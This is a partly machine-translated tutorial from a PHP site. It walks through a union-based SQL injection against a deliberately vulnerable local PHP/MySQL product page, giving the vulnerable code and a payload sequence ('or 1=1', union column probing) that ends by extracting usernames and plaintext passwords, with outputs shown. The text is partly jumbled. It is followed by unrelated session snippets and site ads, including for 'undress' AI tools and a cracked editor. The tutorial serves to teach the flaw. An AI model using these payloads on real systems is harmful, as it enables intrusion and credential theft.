The content of this article is a complete process of SQL injection in PHP. Now I share it with everyone. Friends in need can refer to it.
After learning some skills of SQL injection, the following is Simple practice of SQL injection into PHP MYSQL
First observe two MYSQL data tables
User record table:
REATE TABLE `php_user` ( `id` int(11) NOT NULL auto_increment, `username` varchar(20) NOT NULL default '', `password` varchar(20) NOT NULL default '', `userlevel` char(2) NOT NULL default '0', PRIMARY KEY (`id`) ) TYPE=MyISAM AUTO_INCREMENT=3 ; INSERT INTO `php_user` VALUES (1, 'seven', 'seven_pwd', '10'); INSERT INTO `php_user` VALUES (2, 'swons', 'swons_pwd', '');
## Product record list:
CREATE TABLE `php_product` ( `id` int(11) NOT NULL auto_increment, `name` varchar(100) NOT NULL default '', `price` float NOT NULL default '0', `img` varchar(200) NOT NULL default '', PRIMARY KEY (`id`) ) TYPE=MyISAM AUTO_INCREMENT=3 ; INSERT INTO `php_product` VALUES (1, 'name_1', 12.2, 'images/name_1.jpg'); INSERT INTO `php_product` VALUES (2, 'name_2', 35.25, 'images/name_2.jpg');
The following file is show_product.php used to display the product list. SQL injection also exploits the SQL statement vulnerability of this file
<?php $conn = mysql_connect("localhost", "root", "root"); if(!$conn){ echo "数据库联接错误"; exit; } if (!mysql_select_db("phpsql")) { echo "选择数据库出错" . mysql_error(); exit; } $tempID=$_GET['id']; if($tempID<=0 || !isset($tempID)) $tempID=1; $sql = "SELECT * FROM php_product WHERE id =$tempID"; echo $sql.'<br>'; $result = mysql_query($sql); if (!$result) { echo "查询出错" . mysql_error(); exit; } if (mysql_num_rows($result) == 0) { echo "没有查询结果"; exit; } while ($row = mysql_fetch_assoc($result)) { echo 'ID:'.$row["id"].'<br>'; echo 'name:'.$row["name"].'<br>'; echo 'price:'.$row["price"].'<br>'; echo 'image:'.$row["img"].'<br>'; } ?>
$tempID is obtained from $_GET. We can construct the value of this variable to achieve the purpose of SQL injection
Construct the following links respectively:
1,
http://localhost/phpsql/index.php?id=1
Get the following outputSELECT * FROM php_product WHERE id =1 //当前执行的SQL语句
ID:1 name:name_1 price:12.2 image:images/name_1.jpg 2、 http://localhost/phpsql/index.php?id=1 or 1=1 得到输出 //一共两条产品资料列表 ID:1 name:name_1 price:12.2 image:images/name_1.jpg ID:2 name:name_2 price:35.25 image:images/name_2.jpg 1和2都得到资料列表输出,证明SQL语句执行成功 3、判断数据表字段数量 http://localhost/phpsql/index.php?id=1 union select 1,1,1,1 得到输出 //一共两条记录,注意第二条的记录为全1,这是union select联合查询的结果。 ID:1 name:name_1 price:12.2 image:images/name_1.jpg ID:1 name:1 price:1 image:1 4、判断数据表字段类型 http://localhost/phpsql/index.php?id=1 union select char(65),char(65),char(65),char(65) 得到输出 ID:1 name:name_1 price:12.2 image:images/name_1.jpg ID:0 name:A price:0 image:A 注意第二条记录,如果后面的值等于A,说明这个字段与union查询后面构造的字段类型相符。此时union后面 为char(65),表示字符串类型。经过观察。可以发现name字段和image字段的类型都是字符串类型 5、大功告成,得到我们想要的东西: http://localhost/phpsql/index.php?id=10000 union select 1,username,1,password from php_user 得到输出: SELECT * FROM php_product WHERE id =10000 union select 1,username,1,password from php_user ##//Output two user information, name is the user name , image is the user password. ID:1 name:seven price:1 image:seven_pwd ID:1 name:swons price:1 image:swons_pwd Note that the ID=10000 in the URL is to not get the product information, only to get the following union query results. In more practical situations, the value of the ID is different. The username and password of the union must be placed in positions 2 and 4. Only in this way can it match the previous select statement. This is the characteristic of the union query statement Remarks: This is a simple injection method is more context-specific. In reality it's more complicated than this. But the principle is the same. related suggestion: Data security method for PHP to prevent SQL injection Example of method for PHP to prevent SQL injectionSELECT * FROM php_product WHERE id =1 or 1=1 //当前执行的SQL语句
SELECT * FROM php_product WHERE id =1 union select 1,1,1,1 //当前执行的SQL语句
SELECT * FROM php_product WHERE id =1 union select char(65),char(65),char(65),char(65)
The above is the detailed content of A complete process of SQL injection in PHP. For more information, please follow other related articles on the PHP Chinese website!

PHPsessionstrackuserdataacrossmultiplepagerequestsusingauniqueIDstoredinacookie.Here'showtomanagethemeffectively:1)Startasessionwithsession_start()andstoredatain$_SESSION.2)RegeneratethesessionIDafterloginwithsession_regenerate_id(true)topreventsessi

In PHP, iterating through session data can be achieved through the following steps: 1. Start the session using session_start(). 2. Iterate through foreach loop through all key-value pairs in the $_SESSION array. 3. When processing complex data structures, use is_array() or is_object() functions and use print_r() to output detailed information. 4. When optimizing traversal, paging can be used to avoid processing large amounts of data at one time. This will help you manage and use PHP session data more efficiently in your actual project.

The session realizes user authentication through the server-side state management mechanism. 1) Session creation and generation of unique IDs, 2) IDs are passed through cookies, 3) Server stores and accesses session data through IDs, 4) User authentication and status management are realized, improving application security and user experience.

Tostoreauser'snameinaPHPsession,startthesessionwithsession_start(),thenassignthenameto$_SESSION['username'].1)Usesession_start()toinitializethesession.2)Assigntheuser'snameto$_SESSION['username'].Thisallowsyoutoaccessthenameacrossmultiplepages,enhanc

Reasons for PHPSession failure include configuration errors, cookie issues, and session expiration. 1. Configuration error: Check and set the correct session.save_path. 2.Cookie problem: Make sure the cookie is set correctly. 3.Session expires: Adjust session.gc_maxlifetime value to extend session time.

Methods to debug session problems in PHP include: 1. Check whether the session is started correctly; 2. Verify the delivery of the session ID; 3. Check the storage and reading of session data; 4. Check the server configuration. By outputting session ID and data, viewing session file content, etc., you can effectively diagnose and solve session-related problems.

Multiple calls to session_start() will result in warning messages and possible data overwrites. 1) PHP will issue a warning, prompting that the session has been started. 2) It may cause unexpected overwriting of session data. 3) Use session_status() to check the session status to avoid repeated calls.

Configuring the session lifecycle in PHP can be achieved by setting session.gc_maxlifetime and session.cookie_lifetime. 1) session.gc_maxlifetime controls the survival time of server-side session data, 2) session.cookie_lifetime controls the life cycle of client cookies. When set to 0, the cookie expires when the browser is closed.


Hot AI Tools

Undresser.AI Undress
AI-powered app for creating realistic nude photos

AI Clothes Remover
Online AI tool for removing clothes from photos.

Undress AI Tool
Undress images for free

Clothoff.io
AI clothes remover

Video Face Swap
Swap faces in any video effortlessly with our completely free AI face swap tool!

Hot Article

Hot Tools

VSCode Windows 64-bit Download
A free and powerful IDE editor launched by Microsoft

MinGW - Minimalist GNU for Windows
This project is in the process of being migrated to osdn.net/projects/mingw, you can continue to follow us there. MinGW: A native Windows port of the GNU Compiler Collection (GCC), freely distributable import libraries and header files for building native Windows applications; includes extensions to the MSVC runtime to support C99 functionality. All MinGW software can run on 64-bit Windows platforms.

EditPlus Chinese cracked version
Small size, syntax highlighting, does not support code prompt function

SAP NetWeaver Server Adapter for Eclipse
Integrate Eclipse with SAP NetWeaver application server.

Dreamweaver Mac version
Visual web development tools
